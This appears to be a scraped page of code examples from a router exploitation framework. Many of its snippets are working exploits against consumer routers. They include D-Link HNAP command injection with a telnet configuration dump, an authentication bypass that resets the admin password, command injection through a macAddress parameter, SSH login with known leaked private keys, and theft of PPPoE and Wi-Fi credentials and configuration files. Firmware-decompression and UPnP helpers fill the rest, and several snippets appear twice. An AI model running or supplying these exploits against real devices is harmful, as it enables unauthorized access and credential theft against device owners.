Beispiel #1
0
 def do_run(self, e):
     try:
         print_info("Connecting to:", self.host)
         auth = (self.username, self.password)
         response = requests.get("http://"+self.host+"/basic/home_wan.htm", auth=auth, timeout=60)
         # headers, body = http.request("http://"+self.target+"/basic/home_wan.htm")
         if response.status_code == 200:
             print_success("Authentication successful")
             ppp_credentials = self.fetch_ppp(response.text)
             print_success("PPPoE/PPPoA Username:"******"PPPoE/PPPoA Password", ppp_credentials[1])
             response = requests.get("http://"+self.host+"/basic/home_wlan.htm", auth=auth, timeout=60)
             if response.status_code == 200:
                 wlan_credentials = self.fetch_wlan(response.text)
                 print_success("ESSID:", wlan_credentials[0])
                 print_success("PSK:", wlan_credentials[1])
                 for mac in wlan_credentials[2]:
                     print_success("MAC filter:", mac)
             else:
                 print_error("Status code:", response.status_code)
         elif response.status_code == 401:
             print_error("401 Authentication failed")
         elif response.status_code == 404:
             print_error("404 Page does not exists")
         else:
             print_error("Status code:", response.status_code)
     except requests.exceptions.Timeout:
         print_error("Timeout!")
     except requests.exceptions.ConnectionError:
         print_error("No route to host")
Beispiel #2
0
 def do_run(self, e):
     print_info("Testing known keys")
     client = paramiko.SSHClient()
     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
     connection = core.loader.open_database("./databases/bad_keys.db")
     cursor = connection.cursor()
     cursor.execute("SELECT user, port, filename, type, private_key FROM keys;")
     entries = cursor.fetchall()
     for entry in entries:
         try:
             username = entry[0]
             port = entry[1]
             filename = entry[2]
             key_type = entry[3]
             string_key = entry[4]
             if key_type == 'RSA':
                 private_key = paramiko.RSAKey.from_private_key(io.StringIO(string_key))
             elif key_type == 'DSA':
                 private_key = paramiko.DSSKey.from_private_key(io.StringIO(string_key))
             else:
                 print_error("Failed to load key of type:", key_type)
                 continue
             client.connect(self.host, port=port,  username=username, pkey=private_key, look_for_keys=False,
                            timeout=10)
             core.io.writetextfile(string_key, filename+".key")
             print_success("Username:"******"port:", port)
             print_info("Private key writen to:", filename+".key")
             client.close()
         except paramiko.AuthenticationException:
             pass
         except:
             pass
Beispiel #3
0
Datei: io.py Projekt: j91321/rext
def query_yes_no(question, default="yes"):
    """Ask a yes/no question via raw_input() and return their answer.

    "question" is a string that is presented to the user.
    "default" is the presumed answer if the user just hits <Enter>.
        It must be "yes" (the default), "no" or None (meaning
        an answer is required of the user).

    The "answer" return value is True for "yes" or False for "no".
    """
    valid = {"yes": True, "y": True, "ye": True,
             "no": False, "n": False}
    if default is None:
        prompt = " [y/n] "
    elif default == "yes":
        prompt = " [Y/n] "
    elif default == "no":
        prompt = " [y/N] "
    else:
        raise ValueError("invalid default answer: '%s'" % default)

    while True:
        print_info(question + prompt)
        choice = input().lower()
        if default is not None and choice == '':
            return valid[default]
        elif choice in valid:
            return valid[choice]
        else:
            print_error("Please respond with 'yes' or 'no' " "(or 'y' or 'n').\n")
Beispiel #4
0
    def do_run(self, e):
        url = "http://%s:%s/HNAP1" % (self.host, self.port)

        headers = {
            "SOAPAction":
            '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' %
            self.command
        }
        try:
            print_warning("Sending exploit")
            requests.post(url, headers=headers, timeout=60)
            print_warning(
                "HTTPd is still responding this is OK if you changed the payload"
            )
        except requests.ConnectionError:
            print_success("exploit sent.")
            answer = query_yes_no(
                "Do you wish to dump all system settings? (if telned was started)"
            )
            if answer is True:
                tn = telnetlib.Telnet(self.host, self.port)
                print_info("Sending command through telnet")
                tn.read_until(b'#', timeout=15)
                tn.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n")
                response = tn.read_until(b'#', timeout=15)
                tn.close()
                print_info("Writing response to config.xml")
                writetextfile(response.decode('ascii'), "config.xml")
                print_warning(
                    "Don't forget to restart httpd or reboot the device")
        except requests.Timeout:
            print_error("timeout")
Beispiel #5
0
Datei: io.py Projekt: y0d4a/rext
def query_yes_no(question, default="yes"):
    """Ask a yes/no question via raw_input() and return their answer.

    "question" is a string that is presented to the user.
    "default" is the presumed answer if the user just hits <Enter>.
        It must be "yes" (the default), "no" or None (meaning
        an answer is required of the user).

    The "answer" return value is True for "yes" or False for "no".
    """
    valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
    if default is None:
        prompt = " [y/n] "
    elif default == "yes":
        prompt = " [Y/n] "
    elif default == "no":
        prompt = " [y/N] "
    else:
        raise ValueError("invalid default answer: '%s'" % default)

    while True:
        print_info(question + prompt)
        choice = input().lower()
        if default is not None and choice == '':
            return valid[default]
        elif choice in valid:
            return valid[choice]
        else:
            print_error("Please respond with 'yes' or 'no' "
                        "(or 'y' or 'n').\n")
Beispiel #6
0
    def get_host_info(self, host_info, index):

        if host_info is not None:
            # If this host data is already complete, just display it
            if host_info['dataComplete']:
                print_warning('Data for this host has already been enumerated!')
                return
            try:
                # Get extended device and service information
                if host_info:
                    print_info("Requesting device and service info for " +
                               host_info['name'] + " (this could take a few seconds)...")
                    if not host_info['dataComplete']:
                        (xml_headers, xml_data) = self.get_xml(host_info['xml_file'])
                        # print(xmlHeaders)
                        # print(xmlData)
                        if not xml_data:
                            print_error('Failed to request host XML file:' + host_info['xml_file'])
                            return
                        if not self.get_host_information(xml_data, xml_headers, index):
                            print_error("Failed to get device/service info for " + host_info['name'])
                            return
                    print_success('Host data enumeration complete!')
                    # hp.updateCmdCompleter(hp.ENUM_HOSTS)
                    return
            except KeyboardInterrupt:
                return
Beispiel #7
0
 def do_set(self, e):
     args = e.split(' ')
     if args[0] == "mac":
         if validate_mac(args[1]):
             self.mac = args[1]
             print_info("MAC set to: " + self.mac + " " + lookup_mac(self.mac))
         else:
             print_error("please provide valid MAC address")
Beispiel #8
0
 def decompress_cfg(self, data):
     """Decompress a config file"""
     modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X")
     print_info('Model is :\t' + modelstr)
     rawcfgsize = 0x00100000
     lzocfgsize = unpack(">L", data[0x24:0x28])[0]
     raw = data[:0x2D] + b'\x00' + data[0x2E:0x100] + \
           core.compression.lzo.pydelzo.decompress(b'\xF0' + pack(">L", rawcfgsize) + data[0x100:0x100 + lzocfgsize])
     return raw
Beispiel #9
0
 def decompress_cfg(self, data):
     """Decompress a config file"""
     modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X")
     print_info('Model is :\t' + modelstr)
     rawcfgsize = 0x00100000
     lzocfgsize = unpack(">L", data[0x24:0x28])[0]
     raw = data[:0x2D] + b'\x00' + data[0x2E:0x100] + \
           core.compression.lzo.pydelzo.decompress(b'\xF0' + pack(">L", rawcfgsize) + data[0x100:0x100 + lzocfgsize])
     return raw
Beispiel #10
0
 def decompress_fs(self, data, path):
     """Decompress filesystem"""
     lzofsdatalen = unpack('>L', data[4:8])[0]
     print_info('Compressed FS length: %d [0x%08X]' % (lzofsdatalen, lzofsdatalen))
     # stupid assumption of raw FS length. Seems OK for now
     fsdatalen = 0x800000
     fs_raw = core.compression.lzo.pydelzo.decompress(b'\xF0' + pack(">L", fsdatalen)
                                                      + data[0x08:0x08 + lzofsdatalen])
     cfs = fs(fs_raw)
     return lzofsdatalen, cfs.save_all(path)
Beispiel #11
0
def update_oui():
    if interface.utils.file_exists("./databases/oui.db") and core.globals.ouidb_conn is not None:
            connection = core.globals.ouidb_conn
            cursor = connection.cursor()
            # Truncate database
            print_info("Truncating oui table")
            cursor.execute("""DROP TABLE oui""")
            cursor.execute("""CREATE TABLE oui (
                             id INTEGER PRIMARY KEY NOT NULL,
                             oui TEXT UNIQUE,
                             name TEXT)""")
            # This is very important, sqlite3 creates transaction for every INSERT/UPDATE/DELETE
            # but can handle only dozen of transactions at a time.
            # BEGIN guarantees that only one transaction will be used.
            # Now the DB rebuild should take only seconds
            cursor.execute('begin')
            print_info("Downloading new OUI file")
            path = interface.utils.wget("http://standards.ieee.org/regauth/oui/oui.txt", "./output/tmp_oui.txt")
            if not path:
                print_error('Failed to download')
                return
            file = open(path, "r")
            regex = re.compile(r"\(base 16\)")
            for line in file:
                if regex.search(line) is not None:
                    line = "".join(line.split("\t"))
                    line = line.split("(")
                    oui = line[0].replace(" ", "")
                    company = line[1].split(")")[1]
                    company = company.replace("\n", "")
                    if company == " ":
                        company = "Private"
                    try:
                        cursor.execute("INSERT INTO oui (oui, name) VALUES (?, ?)", [oui, company])
                        status = '\rInserting {0}:{1}'
                        sys.stdout.write(status.format(company, oui))
                    except Exception as e:
                        # CONRAD CORP. and CERN + ROYAL MELBOURNE INST OF TECH share oui, this should be considered
                        # print(e)
                        # print(oui + " " + company)
                        # SELECT name FROM oui.oui WHERE oui = oui
                        # UPDATE oui.oui SET name = name+" OR "+company WHERE oui=oui
                        pass
            print()

            # Add a few OUIs manually (from NMAP oui file)
            cursor.execute("INSERT INTO oui (oui, name) VALUES ('525400', 'QEMU Virtual NIC')")
            cursor.execute("INSERT INTO oui (oui, name) VALUES ('B0C420', 'Bochs Virtual NIC')")
            cursor.execute("INSERT INTO oui (oui, name) VALUES ('DEADCA', 'PearPC Virtual NIC')")
            cursor.execute("INSERT INTO oui (oui, name) VALUES ('00FFD1', 'Cooperative Linux virtual NIC')")
            connection.commit()
            try:
                os.remove("./output/tmp_oui.txt")
            except OSError:
                pass
Beispiel #12
0
 def decompress_fs(self, data, path):
     """Decompress filesystem"""
     lzofsdatalen = unpack('>L', data[4:8])[0]
     print_info('Compressed FS length: %d [0x%08X]' %
                (lzofsdatalen, lzofsdatalen))
     # stupid assumption of raw FS length. Seems OK for now
     fsdatalen = 0x800000
     fs_raw = core.compression.lzo.pydelzo.decompress(
         b'\xF0' + pack(">L", fsdatalen) + data[0x08:0x08 + lzofsdatalen])
     cfs = fs(fs_raw)
     return lzofsdatalen, cfs.save_all(path)
Beispiel #13
0
 def decrypt_cfg(self, data):
     """Decrypt config, bruteforce if default key fails"""
     modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X")
     print_info('Model is :\t' + modelstr)
     ckey = self.make_key(modelstr)
     rdata = self.decrypt(data[0x100:], ckey)
     # if the decrypted data does not look good, bruteforce
     if self.smart_guess(rdata) != self.CFG_LZO:
         rdata = self.brute_cfg(data[0x100:])
         print_success('Used key :\t[0x%02X]' % ckey)
     return data[:0x2D] + b'\x01' + data[0x2E:0x100] + rdata
Beispiel #14
0
 def decrypt_cfg(self, data):
     """Decrypt config, bruteforce if default key fails"""
     modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X")
     print_info('Model is :\t' + modelstr)
     ckey = self.make_key(modelstr)
     rdata = self.decrypt(data[0x100:], ckey)
     # if the decrypted data does not look good, bruteforce
     if self.smart_guess(rdata) != self.CFG_LZO:
         rdata = self.brute_cfg(data[0x100:])
         print_success('Used key :\t[0x%02X]' % ckey)
     return data[:0x2D] + b'\x01' + data[0x2E:0x100] + rdata
Beispiel #15
0
    def do_msearch(self, e):
        default_st = "upnp:rootdevice"
        st = "schemas-upnp-org"
        myip = ''
        lport = self.port

        # if argc >= 3:
        #     if argc == 4:
        #         st = argv[1]
        #         searchType = argv[2]
        #         searchName = argv[3]
        #     else:
        #         searchType = argv[1]
        #         searchName = argv[2]
        #     st = "urn:%s:%s:%s:%s" % (st,searchType,searchName,hp.UPNP_VERSION.split('.')[0])
        # else:
        st = default_st

        # Build the request
        request = "M-SEARCH * HTTP/1.1\r\n" \
                  "HOST:%s:%d\r\n" \
                  "ST:%s\r\n" % (self.host, self.port, st)
        for header, value in self.msearchHeaders.items():
            request += header + ':' + value + "\r\n"
        request += "\r\n"

        print_info("Entering discovery mode for '%s', Ctl+C to stop..." % st)

        # Have to create a new socket since replies will be sent directly to our IP, not the multicast IP
        server = self.create_new_listener(myip, lport)
        if not server:
            print_error('Failed to bind port %d' % lport)
            return

        self.send(request, server)
        count = 0
        start = time.time()

        while True:
            try:
                if 0 < self.max_hosts <= count:
                    break

                if 0 < self.timeout < (time.time() - start):
                    raise Exception("Timeout exceeded")

                if self.parse_ssdp_info(self.recieve(1024, server), False, False):
                    count += 1

            except AttributeError:  # On Ctrl-C parseSSDPInfo raises AttributeError exception
                print('\n')
                print_info('Discover mode halted...')
                break
Beispiel #16
0
 def do_run(self, e):
     f = open(self.input_file, 'rb')
     # These should be offsets of spt.dat but it somehow works with these values usually,
     # the core.compression.lzs is not a very good implementation, it won't decompress the whole file correctly
     # but it's enough to to extract admin password
     fpos = 8568
     fend = 8788
     f.seek(fpos)
     amount = 221
     while fpos < fend:
         if fend - fpos < amount:
             amount = amount
             data = f.read(amount)
             fpos += len(data)
     result, window = core.compression.lzs.LZSDecompress(data)
     print_info("Printing strings found in decompressed data (admin password is usually the first found):")
     for s in interface.utils.strings(result):
         print_success(s)
Beispiel #17
0
 def decompress_firmware(data):
     """Decompress firmware"""
     flen = len(data)
     sigstart = data.find(b'\xA5\xA5\xA5\x5A\xA5\x5A')
     # Try an alternative signature
     if sigstart <= 0:
         sigstart = data.find(b'\x5A\x5A\xA5\x5A\xA5\x5A')
     # Compressed FW block found, now decompress
     if sigstart > 0:
         print_info('Signature found at [0x%08X]' % sigstart)
         lzosizestart = sigstart + 6
         lzostart = lzosizestart + 4
         lzosize = unpack('>L', bytes(data[lzosizestart:lzostart]))[0]
         return data[0x100:sigstart + 2] + core.compression.lzo.pydelzo.decompress(
             b'\xF0' + pack(">L", 0x1000000) + data[lzostart:lzostart + lzosize])
     else:
         print_error('Compressed FW signature not found!')
         return None
Beispiel #18
0
    def do_run(self, e):
        url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port)

        try:
            print_warning("Sending exploit")
            # It took me longer than necessary to find out how to use Content-Disposition properly
            # Always set stream=True otherwise you may not get the whole file
            response = requests.post(url, files={'config': ''}, timeout=60, stream=True)
            if response.status_code == 200:
                if response.headers.get('Content-Disposition'):
                    print_success("got file in response")
                    print_info("Writing file to config.bin")
                    core.io.writefile(response.content, "config.bin")
                    print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML")
        except requests.ConnectionError as e:
            print_error("connection error %s" % e)
        except requests.Timeout:
            print_error("timeout")
Beispiel #19
0
 def do_run(self, e):
     target = "http://" + self.host + ":" + self.port
     try:
         response = requests.get(target + "/rom-0", timeout=60)
         content_type = 'application/octet-stream'
         if response.status_code == requests.codes.ok and response.headers.get('Content-Type') == content_type:
             print_success("got rom-0 file, size:" + str(len(response.content)))
             core.io.writefile(response.content, "rom-0")
         else:
             print_error("failed")
         print_info("Checking if rpFWUpload.html is available")
         response = requests.get(target + "/rpFWUpload.html", timeout=60)
         if response.status_code == requests.codes.ok:
             print_success("rpFWUpload.html is accessible")
         else:
             print_failed("rpFWUpload.html is not accessible")
     except requests.RequestException:
         print_error("timeout!")
Beispiel #20
0
 def save_file(self, i):
     """Extract file #i from current FS"""
     fname = self.get_fname(i)
     # compressed file data offset in FS block
     ds = self.get_offset(i)
     # size of compressed file
     fs = self.get_fsize(i)
     # compressed file data
     fdata = self.cdata[ds:ds + fs]
     # create all subdirs along the path if they don't exist
     pp = fname.split('\\')
     pp = [self.path] + pp
     ppp = os.sep.join(pp[:-1])
     if len(pp) > 1:
         if not os.path.exists(ppp):
             os.makedirs(ppp)
     nfname = os.sep.join(pp)
     # size of uncompressed file
     rawfs = -1
     ff = open(nfname, 'wb')
     # perform extraction, some file types are not compressed
     if fs > 0:
         if pp[-1].split('.')[-1].lower() in [
                 'gif', 'jpg', 'cgi', 'cab', 'txt', 'jar'
         ]:
             rawfdata = fdata
         else:
             try:
                 rawfdata = core.compression.lzo.pydelzo.decompress(
                     b'\xF0' + pack(">L", fs * 64) + fdata)
             except core.compression.lzo.LZO_ERROR as lze:
                 print_warning('File "' + fname +
                               '" is damaged or uncompressed [' + str(lze) +
                               '], RAW DATA WRITTEN')
                 rawfdata = fdata
     else:
         rawfdata = ''
     rawfs = len(rawfdata)
     ff.write(rawfdata)
     ff.close()
     # print some debug info for each file
     print_info('%08X "' % ds + fname + '" %08X' % fs + ' %08X' % rawfs)
     return fs, rawfs
Beispiel #21
0
 def do_run(self, e):
     target = "http://" + self.host + ":" + self.port
     try:
         response = requests.get(target + "/rom-0", timeout=60)
         content_type = 'application/octet-stream'
         if response.status_code == requests.codes.ok and response.headers.get(
                 'Content-Type') == content_type:
             print_success("got rom-0 file, size:" +
                           str(len(response.content)))
             core.io.writefile(response.content, "rom-0")
         else:
             print_error("failed")
         print_info("Checking if rpFWUpload.html is available")
         response = requests.get(target + "/rpFWUpload.html", timeout=60)
         if response.status_code == requests.codes.ok:
             print_success("rpFWUpload.html is accessible")
         else:
             print_failed("rpFWUpload.html is not accessible")
     except requests.RequestException:
         print_error("timeout!")
Beispiel #22
0
 def decompress_firmware(data):
     """Decompress firmware"""
     flen = len(data)
     sigstart = data.find(b'\xA5\xA5\xA5\x5A\xA5\x5A')
     # Try an alternative signature
     if sigstart <= 0:
         sigstart = data.find(b'\x5A\x5A\xA5\x5A\xA5\x5A')
     # Compressed FW block found, now decompress
     if sigstart > 0:
         print_info('Signature found at [0x%08X]' % sigstart)
         lzosizestart = sigstart + 6
         lzostart = lzosizestart + 4
         lzosize = unpack('>L', bytes(data[lzosizestart:lzostart]))[0]
         return data[0x100:sigstart +
                     2] + core.compression.lzo.pydelzo.decompress(
                         b'\xF0' + pack(">L", 0x1000000) +
                         data[lzostart:lzostart + lzosize])
     else:
         print_error('Compressed FW signature not found!')
         return None
Beispiel #23
0
    def do_pcap(self, e):
        print_info('Entering passive mode, Ctrl+C')

        count = 0
        start = time.time()

        while True:
            try:
                if 0 < self.max_hosts <= count:
                    break

                if 0 < self.timeout < (time.time() - start):
                    raise Exception("Timeout exceeded")

                if self.parse_ssdp_info(self.recieve(1024, False), False, False):
                    count += 1

            except Exception as e:
                print("\n")
                print_info("Passive mode halted...")
                break
Beispiel #24
0
 def save_file(self, i):
     """Extract file #i from current FS"""
     fname = self.get_fname(i)
     # compressed file data offset in FS block
     ds = self.get_offset(i)
     # size of compressed file
     fs = self.get_fsize(i)
     # compressed file data
     fdata = self.cdata[ds: ds + fs]
     # create all subdirs along the path if they don't exist
     pp = fname.split('\\')
     pp = [self.path] + pp
     ppp = os.sep.join(pp[:-1])
     if len(pp) > 1:
         if not os.path.exists(ppp):
             os.makedirs(ppp)
     nfname = os.sep.join(pp)
     # size of uncompressed file
     rawfs = -1
     ff = open(nfname, 'wb')
     # perform extraction, some file types are not compressed
     if fs > 0:
         if pp[-1].split('.')[-1].lower() in ['gif', 'jpg', 'cgi', 'cab', 'txt', 'jar']:
             rawfdata = fdata
         else:
             try:
                 rawfdata = core.compression.lzo.pydelzo.decompress(b'\xF0' + pack(">L", fs * 64) + fdata)
             except core.compression.lzo.LZO_ERROR as lze:
                 print_warning('File "' + fname + '" is damaged or uncompressed ['
                               + str(lze)
                               + '], RAW DATA WRITTEN')
                 rawfdata = fdata
     else:
         rawfdata = ''
     rawfs = len(rawfdata)
     ff.write(rawfdata)
     ff.close()
     # print some debug info for each file
     print_info('%08X "' % ds + fname + '" %08X' % fs + ' %08X' % rawfs)
     return fs, rawfs
Beispiel #25
0
 def do_run(self, e):
     file = ""
     for file in self.files:
         print_info("Testing file: " + file)
         url = "http://%s:%s/%s?writeData=true&reginfo=0&macAddress= 001122334455 -c 0 ;" \
               "%s; echo #" % (self.host, self.port, file, "sleep 10")
         try:
             print_info("Doing timebased check with sleep 10")
             time_start = datetime.datetime.now()
             response = requests.get(url=url, timeout=60)
             time_end = datetime.datetime.now()
             delta = time_end - time_start
             if response.status_code == 200 and "Update Success!" in response.text:
                 if 13 > delta.seconds > 9:
                     print_success("Timebased check OK target should be vulnerable")
                 else:
                     print_warning("Timebased check failed, but target still might be vulnerable")
                 break
         except requests.Timeout:
             print_error("timeout")
         except requests.ConnectionError:
             print_error("exploit failed")
     print_success("Vulnerable file:" + file)
     print_info("Sending command")
     url = "http://%s:%s/%s?writeData=true&reginfo=0&macAddress= 001122334455 -c 0 ;" \
           "%s; echo #" % (self.host, self.port, file, self.command)
     try:
         response = requests.get(url=url, timeout=60)
         if response.status_code == 200 and "Update Success!" in response.text:
             print_success("command sent")
     except requests.Timeout:
         print_error("timeout")
     except requests.ConnectionError:
         print_error("target stopped responding or you issued reboot or killed lighttpd")
Beispiel #26
0
    def do_set(self, e):
        args = e.split(' ')
        try:
            if args[0] == "host":
                if interface.utils.validate_ipv4(args[1]):
                    self.host = args[1]
                else:
                    print_error("Please provide valid IPv4 address")
            elif args[0] == "port":
                if str.isdigit(args[1]):
                    self.port = args[1]
                else:
                    print_error("Port value must be integer")
            elif args[0] == 'device':
                if not str.isdigit(args[1]):
                    print_error("Invalid device ID")
                elif int(args[1]) < 0 or int(args[1]) > len(self.devices):
                    print_error("Invalid device ID")
                else:
                    index = int(args[1])
                    print_info("Device: %s" % self.devices[index]['name'])
                    self.number = self.devices[index]['number']
                    print_info("Setting address to: %d" % self.number)
                    self.offset = self.devices[index]['offset']
                    print_info("Setting offset: %d" % self.offset)

        except IndexError:
            print_error("please specify value for variable")
Beispiel #27
0
 def do_run(self, e):
     print_info("Testing known keys")
     client = paramiko.SSHClient()
     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
     connection = core.loader.open_database("./databases/bad_keys.db")
     cursor = connection.cursor()
     cursor.execute(
         "SELECT user, port, filename, type, private_key FROM keys;")
     entries = cursor.fetchall()
     for entry in entries:
         try:
             username = entry[0]
             port = entry[1]
             filename = entry[2]
             key_type = entry[3]
             string_key = entry[4]
             if key_type == 'RSA':
                 private_key = paramiko.RSAKey.from_private_key(
                     io.StringIO(string_key))
             elif key_type == 'DSA':
                 private_key = paramiko.DSSKey.from_private_key(
                     io.StringIO(string_key))
             else:
                 print_error("Failed to load key of type:", key_type)
                 continue
             client.connect(self.host,
                            port=port,
                            username=username,
                            pkey=private_key,
                            look_for_keys=False,
                            timeout=10)
             core.io.writetextfile(string_key, filename + ".key")
             print_success("Username:"******"port:", port)
             print_info("Private key writen to:", filename + ".key")
             client.close()
         except paramiko.AuthenticationException:
             pass
         except:
             pass
Beispiel #28
0
    def do_run(self, e):
        url = "http://%s:%s/HNAP1" % (self.host, self.port)

        headers = {"SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % self.command}
        try:
            print_warning("Sending exploit")
            requests.post(url, headers=headers, timeout=60)
            print_warning("HTTPd is still responding this is OK if you changed the payload")
        except requests.ConnectionError:
            print_success("exploit sent.")
            answer = query_yes_no("Do you wish to dump all system settings? (if telned was started)")
            if answer is True:
                tn = telnetlib.Telnet(self.host, self.port)
                print_info("Sending command through telnet")
                tn.read_until(b'#', timeout=15)
                tn.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n")
                response = tn.read_until(b'#', timeout=15)
                tn.close()
                print_info("Writing response to config.xml")
                writetextfile(response.decode('ascii'), "config.xml")
                print_warning("Don't forget to restart httpd or reboot the device")
        except requests.Timeout:
            print_error("timeout")
Beispiel #29
0
    def do_run(self, e):
        url = "http://%s:%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" % (self.host, self.port)

        try:
            print_warning("Sending exploit")
            response = requests.get(url, timeout=60)
            if response.status_code == 200 and 'name="admin_password1"' in response.text:
                print_success("target seems vulnerable")
                print_success("You can visit any page by adding ?NO_NEED_AUTH=1&AUTH_GROUP=0 to URL")
                print_info("Changing admin password")
                headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                           'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
                           'Accept-Encoding': 'gzip, deflate',
                           'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
                           }
                payload = {'NO_NEED_AUTH': 1,
                           'AUTH_GROUP': 0,
                           'ACTION_POST': 1,
                           'apply': 'Save+Settings',
                           'admin_name': 'admin',
                           'admin_password1': '%s' % self.password,
                           'admin_password2': '%s' % self.password,
                           'grap_auth_enable_h': 0,
                           'rt_ipaddr': '0.0.0.0'}
                url = "http://%s:%s/tools_admin.php" % (self.host, self.port)
                response = requests.post(url=url, headers=headers, data=payload, timeout=60)
                if response.status_code == 200:
                    print_success("password seems to be changed try to login with: %s" % self.password)
                else:
                    print_error("password change failed")

            else:
                print_error("exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
Beispiel #30
0
    def do_run(self, e):
        url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (
            self.host, self.port)

        try:
            print_warning("Sending exploit")
            # It took me longer than necessary to find out how to use Content-Disposition properly
            # Always set stream=True otherwise you may not get the whole file
            response = requests.post(url,
                                     files={'config': ''},
                                     timeout=60,
                                     stream=True)
            if response.status_code == 200:
                if response.headers.get('Content-Disposition'):
                    print_success("got file in response")
                    print_info("Writing file to config.bin")
                    core.io.writefile(response.content, "config.bin")
                    print_success(
                        "you can now use decryptors/zte/config_zlib_decompress to extract XML"
                    )
        except requests.ConnectionError as e:
            print_error("connection error %s" % e)
        except requests.Timeout:
            print_error("timeout")
Beispiel #31
0
 def do_run(self, e):
     try:
         print_info("Connecting to:", self.host)
         auth = (self.username, self.password)
         response = requests.get("http://" + self.host +
                                 "/basic/home_wan.htm",
                                 auth=auth,
                                 timeout=60)
         # headers, body = http.request("http://"+self.target+"/basic/home_wan.htm")
         if response.status_code == 200:
             print_success("Authentication successful")
             ppp_credentials = self.fetch_ppp(response.text)
             print_success("PPPoE/PPPoA Username:"******"PPPoE/PPPoA Password", ppp_credentials[1])
             response = requests.get("http://" + self.host +
                                     "/basic/home_wlan.htm",
                                     auth=auth,
                                     timeout=60)
             if response.status_code == 200:
                 wlan_credentials = self.fetch_wlan(response.text)
                 print_success("ESSID:", wlan_credentials[0])
                 print_success("PSK:", wlan_credentials[1])
                 for mac in wlan_credentials[2]:
                     print_success("MAC filter:", mac)
             else:
                 print_error("Status code:", response.status_code)
         elif response.status_code == 401:
             print_error("401 Authentication failed")
         elif response.status_code == 404:
             print_error("404 Page does not exists")
         else:
             print_error("Status code:", response.status_code)
     except requests.exceptions.Timeout:
         print_error("Timeout!")
     except requests.exceptions.ConnectionError:
         print_error("No route to host")
Beispiel #32
0
    def initialize_sockets(self):
        try:
            # This is needed to join a multicast group
            self.mreq = struct.pack("4sl", socket.inet_aton(self.host), socket.INADDR_ANY)
            # Set up client socket
            self.csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            self.csock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
            # Set up server socket
            self.ssock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
            self.ssock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # BSD systems also need to set SO_REUSEPORT
            try:
                self.ssock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
            except Exception:
                pass

            # Only bind to this interface
            if self.interface is not None:
                print_info("Binding to interface: " + self.interface)
                self.ssock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE,
                                      struct.pack("%ds" % (len(self.interface) + 1,), self.interface))
                self.csock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE,
                                      struct.pack("%ds" % (len(self.interface) + 1,), self.interface))

            try:
                self.ssock.bind(('', self.port))
            except Exception:
                print_warning("failed to bind: " + self.host + ":" + str(self.port) + " ")
            try:
                self.ssock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, self.mreq)
            except Exception:
                print_warning("failed to join multicast group")
        except Exception:
            print_error("failed to initialize UPNP sockets")
            return False
        return True
Beispiel #33
0
 def do_update(self, e):
     args = e.split(' ')
     if args[0] == "oui":
         print_info("Updating OUI DB. Database rebuild may take several minutes.")
         # print_blue("Do you wish to continue? (y/n)")
         # Add if here
         updater.update_oui()
         print_success("OUI database updated successfully.")
     elif args[0] == "force":
         print_info("Discarding local changes and updating REXT")
         updater.update_rext_force()
     elif args[0] == "":
         print_info("Updating REXT please wait...")
         updater.update_rext()
         print_success("Update successful")
Beispiel #34
0
 def do_run(self, e):
     payload = self.keygen()
     print_success("payload generated")
     print("Payload:%s" % (hexlify(payload).decode()))
     core.io.writefile(payload, "payload.hex")
     print_info("Payload saved to payload.hex")
Beispiel #35
0
 def do_file(self, e):
     print_info(self.input_file)
Beispiel #36
0
 def decompress_fs_only(self, data, path):
     """Decompress filesystem"""
     fsstart = unpack('>L', data[:4])[0]
     print_info('FS block start at: %d [0x%08X]' % (fsstart, fsstart))
     return self.decompress_fs(data[fsstart:], path)
Beispiel #37
0
 def do_serial(self, e):
     print_info(self.serial)
Beispiel #38
0
 def do_set(self, e):
     args = e.split(' ')
     if args[0] == "serial":
         self.serial = args[1]
         print_info("Serial number set to: " + self.serial)
Beispiel #39
0
 def do_mac(self, e):
     print_info(self.mac)
Beispiel #40
0
 def do_mac(self, e):
     print_info(self.mac)
Beispiel #41
0
 def do_port(self, e):
     print_info(self.port)
Beispiel #42
0
 def do_file(self, e):
     print_info(self.file)
Beispiel #43
0
    def do_run(self, e):
        url = "http://%s:%s/" % (self.host, self.port)

        # Headers with SOAP requests
        headers = {"SOAPAction": "urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo"}
        headers1 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo"}
        headers2 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo"}
        headers3 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys"}
        headers4 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetAttachDevice"}

        payload = {"": ""}  # Empty form will cause that the auth is bypassed

        # This is a very stupid way to parse XML but xml.etree is not playing nice with SOAP and
